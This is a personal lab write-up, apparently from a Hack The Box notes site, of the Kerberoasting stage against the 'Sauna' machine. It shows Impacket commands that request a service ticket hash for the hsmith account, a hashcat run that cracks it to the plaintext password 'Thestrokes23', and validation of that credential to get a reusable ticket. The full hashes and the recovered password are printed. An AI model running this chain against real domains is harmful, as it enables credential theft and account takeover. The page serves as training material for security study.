Kerberoasting

As discovered though bloodhound, the hsmith user is vulnerable to Kerberoasting

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ KRB5CCNAME=fsmith.ccache impacket-GetUserSPNs EGOTISTICAL-BANK.LOCAL/ -no-pass -k -request -dc-ip $IP               
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
sauna/hsmith.egotisticalbank.local:60111  HSmith            2020-01-23 06:54:34.140321  <never>               
 
 
 
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$1c2c92bc100e649f9546e832d418c5cc$0408fad10013c582fc443264274dc1842f37a7fa27e9af3147064177ea697bd6d416ba2cf07c6919c0ed003bfa65c09a29dfa9146b909b152e4eb9311c24f61110834327ab4b4fd2b83850e04f8e9c9ad7f130feaaa47fa7b3ce7c144bd1a75ec1325353b96ed032599f1e5455222668affb4b0d6c80f2e5a1aca2411f08d7a051ef0766d805b670a1dd3f80d745db7d6d6c35bf12674068b1ef5f7170d007a12c4696e9cf71b68c0db62a6b10d47af96228ee418bee60b3259e533b1d6cbd7f2ba27e3eac6b23b747254641f09bf9f5a7886b572151d5877142a67aef5c86b3d3d7647695a237cfb4f38a3cfad8d2542d0674e8ce6c7972f0a214d81562e577d5a972b53f36cf15aedb257abf83f2727800adcf18dca1617f7fba596a6a1e75348750aac0ed1f1f7124adc1905d9f34f59fbe76c4a73bae1cf3069da46af5133ebcf3340c790858f490b72b712337530a97c592512c4b561cc19bd4e675179e4f98aba9dfd51c6afa30b023e69c656c2dc53854efea9a71849cef1ad2d43fe9e5c963d49f0ae264e0cd921fdfcb7d5ce929a33c3213b6d4f15dcdaa818f850b5039a0db77663b17f70aebcd8cf6ab1d5bef81996b6463384806f174b72c59fe5270fc75277b557a445f6fefcd029dfc074605ea2525b453d2c11c99440a493b565a9d2e19b545328300e12ac7ca6835fef8dbdf8a40617ae1c8f44adb0672fbdc279af8b826fc41bf94a738aaf336adba046c110ae9fa0846f386ebc834d5fa17ccd24e7ef1977a0d24ca7d78f8a193b52ecdcdb8e3f9c903142f6fcc1243f2a5a35e9653be7763e93e771cff5fb82611ecb8425bec66993e802c6e65f1c4078d90866d87d33c9d06f0f7f49005c39e2473ec2b6ec82ddb6a18d1776d1ef5a9dc5eb49e39ee38c5565c6fc6a076b5e910f591e780bdb50e7379565fac12dda35eb4160bcbe6d736d51f777a1a09e2dbffc5a23972a02c4d1ee3debcb068843712bc93d3e508c192ae27bf27a12fc8b8bc520cf9a9e0c61fdf49c5d4f3746613e5dfc94aafecbd84d1521895174063bf3648a30d818a82862d2104d9126afe3d23a56a426456eb7681e22198449cf05d220c5d8098aec642e2f8c8fbe05b7805ef1be3e592d00f6f16e7ef3e75d8e72be7016556626410cddcc6a8eae961c91a035ca9ce486f63be82301f56fbd54b8cf362c993abee814b962523954ce960445e20337066d467f6fd07ced1e22dbabe50b9a55bad848162a825067fd16d78ee325b7323d276668c0ea89fd156c9d0ec5947685238519aa657fa0e434f2c4025f71b15c3bc367cb5cf3735b455c8a1c0a369739e7e0d3f41f23199e90591045341efb2dc87a56e359690177dd05984ec16da22ccc460eade46fa63eeb846b22c62ec550804

Using the TGT of the fsmith user, I am able to authenticate to the target KDC to Kerberoast the hsmith user, effectively extracting the TGS hash the spn is sauna/hsmith.egotisticalbank.local:60111

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ hashcat -a 0 -m 13100 hsmish.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$53f66cc5f2cdd03e4ce75a3050a4ef62$be4a207e5a9680f29c7753b7008c0dd2ca1f85550a431a1b6fe32363a49b000b9af5113f07b7d922d9f1fbe6907232fb84b760f885834390ceb34995f400fcfa91ba7cb44aa5dabb269eed71deb255092133d79a7bc5769d449b86abbded40dc6b500a76d96ac33748a343c31cb6d538146aff54b9aea15f01277a21a3d8c786b421f25d39364e2adfa16d953fb0400bd49d76a4524a0621d1649db3b5a1b4c02e4a9b63415aa1f87415979aca0741d31c25f928eba1d43fa68af4ff0907fd4a183fb1e82f6a816757d1b2a5fc15d197103b591eeaf8c953b20c693f73cb186fdcb8f0b65045610507a9954a63176bcce160f47708c84e36c160347a19dbe229d7397201b10ddffec5a5105c8d84b84f566e282784bb25410c64a6e5d38b4c6fd63d25c3a7c5814e23a7622363470a60fb97f87f4438a63ac732640dc982ffa08cccdda3c074daac7504f9294218e5dbdca55cf1f65da9b3c1e71b013cd295bdc2db20dc94c38c002fd8a0b4d240bcc099dde6dc5cdaf608e92e7ee61a9a481e75deea184097286be9a7c82c44c881f219ec33a61b8455c0f9e1706d6d5467cc2452d06d8e25e7f7a7ee6d3b9e7cea77917403e7c0ab472dcb6fa974488c4198fe81e7c84797f3f68b5d45fba022b3c58e291957c9468e424f420aed738e86ae66ceb5b3c00fe3146e140c0521e3844b78157fafbf69927069f33b8a403e7ccde935eb05b22592119819e1c2671bc79ea2558f47da2f35a3ded54735e1505a7706d07460a877bc2c0a58a8e17bb7ead040faa805b55729124f9ed027a4e757e3a1231a67a13ce22e53f0fc65a9f5fe259856f99fbfa91468a833b059612dee488ea949de5de1fd8555ad1aac0be6b11947b80e2068ab199778d280c3b72e773d1da98c64c449bb7953ac14e9a3c44489a0301eba170357064ac165944e963d12d5d8b2b6bafce57cd98e5cb02fd4e6b7f8edd85985e37532c3b8fb0b5b5e6b800957d52a2ec916d027702a7c1ed08e50392126fe536aa7121e78782fa916bd75e54db9b70e46a439e858472981a202fd8b3d0d5849d3c3d88decaf491e0239c572359d670487e373884d6976b044be185a375b650612c959f3cd0a8c94bc9e7719e7f8e5db17336c74976b9d9c6ab792e63cc5c4f44754d8ce4d9dd5446d0873209def63652e6128bd052cd6f5fe686ff5eeebe49090572bff1ccd5dc9f9eb04cb7db72a387fd1fc1eb8cdfae3fcca2267734afa851599333dcc741864181e99164aa8bcdab93c1a9368da945ebffe582efe88d607277902059979f57d8d5f102b3dcd2afd360c221c31d197c8c03b1c1dbbdf1cc162985e70cb88e467219ce0fca98e51d92da10a339c4b17df5efae07b06dee8067cb593f4a65d7bf8a64dc5843c916f02:Thestrokes23
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTI...916f02
Time.Started.....: Sat Mar 25 19:14:08 2023 (9 secs)
Time.Estimated...: Sat Mar 25 19:14:17 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1175.6 kH/s (0.47ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539264/14344385 (73.47%)
Rejected.........: 0/10539264 (0.00%)
Restore.Point....: 10538496/14344385 (73.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Thip1812 -> Thebasket_zaa
Hardware.Mon.#1..: Util: 67%
 
Started: Sat Mar 25 19:14:07 2023
Stopped: Sat Mar 25 19:14:18 2023

hashcat was able to crack the TGS hash The cracked password is Thestrokes23 Surprisingly, it is the same password that used for the fsmith user

However, I still need to validate the credential

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-gettgt 'egotistical-bank.local/hsmith:Thestrokes23' -dc-ip $IP 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in hsmith.ccache

The credential of the hsmith has been validated against the target KDC I also saved a TGT for the user to continue with the pass-the-ticket technique

InfoSec LAB

Explorer

Sauna_Kerberoasting

Kerberoasting

Password Cracking

Validation

Interactive Graph View

Table of Contents

Backlinks